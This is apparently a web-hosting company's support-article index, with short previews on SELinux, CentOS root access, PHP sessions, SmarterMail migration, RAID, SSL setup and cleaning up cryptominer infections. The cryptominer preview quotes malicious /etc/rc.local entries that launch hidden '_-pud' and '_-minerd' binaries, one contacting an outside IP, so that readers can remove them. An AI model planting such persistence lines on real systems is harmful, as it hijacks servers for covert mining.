Search Our Database

How to disable SELinux

Introduction SELinux (Security-Enhanced Linux) is a security module in the Linux kernel that provides a mechanism for supporting access control security policies. By default, SELinux is set to ‘Enforcing’ mode, which can restrict certain operations on the system. In some scenarios, you might need to disable SELinux. This guide will show you how to disable

How to disable root access in CentOS?

Warning: CentOS 7 reached its end-of-life (EOL) on June 30, 2024. This means it no longer receives security updates or support from the developers. It is strongly recommended to upgrade to a supported operating system version, such as CentOS Stream 9 or an alternative Linux distribution, to maintain security and stability. Introduction Directly using the

How to Enable Session Support for PHP using .htaccess

Introduction Enabling session support in PHP is essential for maintaining user data across multiple web pages, such as login sessions, shopping carts, and user preferences. This guide will show you how to enable PHP sessions using the .htaccess file.   Step-by-Step Guide Step 1: Create a .htaccess File The .htaccess file is a powerful tool

How to move a domain to a different SmarterMail server

Introduction This article provides a step-by-step guide on how to move a domain from one SmarterMail server to another. It is intended for users who need to migrate domains between SmarterMail servers. The guide will walk you through exporting domain data, transferring files, and configuring the domain on the new server.   Prerequisites Access to

CentOS Installation with Software RAID

Warning: CentOS 7 reached its end-of-life (EOL) on June 30, 2024. This means it no longer receives security updates or support from the developers. It is strongly recommended to upgrade to a supported operating system version, such as CentOS Stream 9 or an alternative Linux distribution, to maintain security and stability.   Introduction This guide

Fixing high server loads caused by mining processes in Linux

If you encounter an abnormal high load process in your server, it may be due to hidden mining processes. vi /etc/rc.local Check for the following 2 lines in the file and remove it: nohup /usr/bin/_-pud 119.78.232.8 >/dev/null& nohup /usr/bin/_-minerd -c /usr/bin_-config 2> /dev/null& Remove the following files: rm /usr/bin/_-minerd rm /usr/bin/_-pud rm /usr/bin/_-config rm /etc/ld.so.preload

How to install SSL certificates in DirectAdmin

Introduction Hello users! It looks like you’ve just purchased an Alpha SSL certificate from IPSERVERONE, and you’ve received an email containing a URL and PIN. If you’re not sure what to do next, don’t worry! We’re here to guide you through the process of installing your Alpha SSL certificate using DirectAdmin.